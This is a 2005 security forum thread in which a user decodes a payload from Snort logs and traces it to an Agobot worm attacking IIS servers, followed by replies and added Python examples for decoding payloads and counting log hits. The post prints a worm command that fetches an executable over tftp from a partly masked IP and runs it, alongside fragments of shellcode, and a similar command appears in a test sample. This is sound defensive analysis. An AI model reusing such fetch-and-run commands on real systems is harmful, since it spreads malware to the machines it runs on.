Clan x86
Technical (Development, Security, etc.) => General Security Information => Topic started by: iago on June 09, 2005, 06:41:12 pm
-
I was looking at my Snort logs (although this would also be seen in Apache's logs) and found this string repeated many times, more each day for the last 4 days, showing up as an attempted overflow:
This was coming from all over, and looks like an exploit. Something that doesn't belong. So I whip out my trusty base64 decoder and run it through (because a lot of it is in hex, I ran it through strings to pull out any strings):
AAAAAAAAAAAAAAAAAAAAAAAAA
ÄTòÿÿüèF
ëã.I
Âëô;T$
Ã1Àd
h<_1ö`Vë
hïÎà`h
Wÿçèîÿÿÿcmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB#
What it looks like is some shellcode that runs the command:
cmd /c tftp -i 142.161.66.4x GET wuamkop.exe&start wuamkop.exe&exit
Which is:
Run cmd, with the command tftp (an ftp client) which gets wuamkop.exe, runs it, and ends the program. (NOTE: I added the x at the end of the IP, just to prevent potential mishaps with people running that command and getting infected :P)
A quick google on that filename turns up:
http://www.liutilities.com/products/wintaskspro/processlibrary/wuamkop/
Which says:
Process File: wuamkop or wuamkop.exe
Process Name: WORM_AGOBOT Variant
Conclusion: It's an AGOBOT worm/trojan spreading itself using a web server vulnerability. I'm not sure which server is vulnerable but, being a .exe, it's not mine (it's a Windows worm) :)
Hope that somebody found that interesting.
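The triage the post walks through (base64-decode the captured body, pull printable strings out of the binary, read off the download host and dropped filename) in Python, as an added example that is not iago's code. The payload it decodes is constructed for the example: a pad, a few non-printable bytes and a command string pointing at a TEST-NET address (192.0.2.10), with no real shellcode in it.

```python
import base64
import re

# Constructed sample: base64 of some filler bytes plus a command string, standing in
# for the blob the post decoded. The address is from the RFC 5737 TEST-NET range.
SAMPLE_PAYLOAD = base64.b64encode(
    b"A" * 25
    + b"\xc4\x54\xf2\xff\xff\xfc\xe8\x46\x00"
    + b"cmd /c tftp -i 192.0.2.10 GET sample.exe&start sample.exe&exit"
    + b"\x00"
    + b"B" * 40
    + b"#"
).decode("ascii")

MIN_STRING_LEN = 4  # same default as the strings(1) utility


def decode_payload(b64_text: str) -> bytes:
    """Base64-decode a captured request body (what `mimencode -u` does)."""
    return base64.b64decode(b64_text, validate=True)


def extract_strings(data: bytes, min_len: int = MIN_STRING_LEN) -> list[str]:
    """Return runs of printable ASCII at least min_len bytes long, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXE_RE = re.compile(r"\b[\w.-]+\.exe\b", re.IGNORECASE)


def extract_indicators(strings: list[str]) -> dict:
    """Pull the download host, dropped filenames and command lines out of the strings."""
    ips, exes, commands = set(), set(), []
    for s in strings:
        if s.startswith("cmd ") or "tftp" in s:
            commands.append(s)
        ips.update(IPV4_RE.findall(s))
        exes.update(EXE_RE.findall(s))
    return {"ips": sorted(ips), "files": sorted(exes), "commands": commands}


def analyze(b64_text: str) -> dict:
    """Decode, string-extract and summarise one captured payload."""
    return extract_indicators(extract_strings(decode_payload(b64_text)))


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_PAYLOAD).items():
        print(f"{key}: {value}")
```

The indicator step is the part worth keeping around: the host and filename are what you feed to a firewall rule or a search across the rest of your logs, and they survive even when the surrounding shellcode changes between variants.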
-
There was a post on bugtraq about this, maybe security-basics. Let me see if I can find the corresponding thread.
[EDIT]: Nevermind, it was on Incidents, and there is no online log of those threads as far as I can find. It does seem like there's a new Windows server exploit like this going around.
-
It was on "incidents". And that is an sdbot variant; this is agobot. Same exploit, though.
-
Here are a couple graphs of this attack:
The number of times it hit me, by hour:
http://www.javaop.com/~iago/worm_analysis_byhour.html
The number of times it hit me, by day:
http://www.javaop.com/~iago/worm_analysis_byday.html
As you can see, it's only really been around since the 6th, and it looks like it already peaked. In another week, I'll see how it looks again.
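The by-hour and by-day counts behind those graphs, as an added Python example that is not iago's script. It reads Apache combined-format lines, keeps only the ones matching a signature for the attack request, and buckets them by hour of day, calendar day and source address. The log lines are constructed for the example (RFC 5737 addresses, and a made-up "POST /probe" request standing in for the real one), and `is_probe` is a placeholder signature; a real one would key on whatever request line or body the IDS alerted on.

```python
import re
from collections import Counter
from datetime import datetime

# Constructed Apache combined-format lines standing in for the poster's logs.
SAMPLE_LOG = """\
192.0.2.7 - - [06/Jun/2005:02:14:31 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
198.51.100.23 - - [06/Jun/2005:02:58:02 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
203.0.113.9 - - [07/Jun/2005:14:03:45 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
192.0.2.7 - - [07/Jun/2005:14:41:10 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
198.51.100.23 - - [07/Jun/2005:23:59:59 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
203.0.113.9 - - [08/Jun/2005:14:12:00 -0600] "POST /probe HTTP/1.0" 404 287 "-" "-"
198.51.100.23 - - [08/Jun/2005:09:00:00 -0600] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
this line is not a log entry and is skipped
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"  # Apache's default %t layout


def parse_line(line: str):
    """Parse one combined-format line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "time": datetime.strptime(m.group("ts"), TS_FORMAT),
        "req": m.group("req"),
        "status": int(m.group("status")),
    }


def is_probe(entry: dict) -> bool:
    """Placeholder signature for the attack request (constructed for this example)."""
    return entry["req"].startswith("POST /probe ")


def bucket_hits(log_text: str):
    """Count matching requests by hour of day, by calendar day and by source IP."""
    by_hour, by_day, by_source = Counter(), Counter(), Counter()
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None or not is_probe(entry):
            continue
        by_hour[entry["time"].hour] += 1
        by_day[entry["time"].date().isoformat()] += 1
        by_source[entry["ip"]] += 1
    return by_hour, by_day, by_source


def peak_day(by_day: Counter) -> str:
    """Day with the most hits (earliest day wins on a tie)."""
    return max(sorted(by_day), key=lambda d: by_day[d])


if __name__ == "__main__":
    hours, days, sources = bucket_hits(SAMPLE_LOG)
    print("by hour:", dict(sorted(hours.items())))
    print("by day:", dict(sorted(days.items())))
    print("by source:", sources.most_common())
    print("peak day:", peak_day(days))
```

The per-source counter is the one extra that a worm like this makes worthwhile: a handful of addresses each hitting a few times is the random-scan pattern the thread goes on to describe, whereas one address hammering repeatedly is something else and deserves its own look.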
-
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
-
Heh, it must not occur to the attacker(s) that you're running SlackWare and that you're like, a network security god.
Well, it's spreading itself along the internet. Most likely just selecting random IPs along a specified subnet, and attempting to exploit each machine, then skipping to the next.
-
Yeah, I'm assuming it's just a plain worm. It randomly either picks an IP or, like Archon said, scans a subnet.
-
What was your command-string that you used to run that through your decoder ?
-
It was pretty obvious that it was base64, and I discovered the easy way to decode that is mimencode -u. I think you can also use uuencode somehow.
-
Interesting, is this an exploit in 1.02+?
How does the virus get to the point where it can reach the server's FTP, and why would I care if I was on Linux Red Hat Apache? I can control access, can't I? How does it exploit me? It uploads an exe and runs it too (right?).
Just curious because I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.
-
Interesting, is this an exploit in 1.02+?
How does the virus get to the point where it can reach the server's FTP, and why would I care if I was on Linux Red Hat Apache? I can control access, can't I? How does it exploit me? It uploads an exe and runs it too (right?).
Just curious because I set up a little Apache server for my school as a side project in science class. I maintain it voluntarily.
You're making very little sense, but anyway, it's an IIS worm so Apache isn't affected. I don't know what you mean by "1.02", Apache is vulnerable up to "1.3.26" or so. There aren't any .exe's on Red Hat, so I wouldn't worry about that.
-
nvm, issue cleared up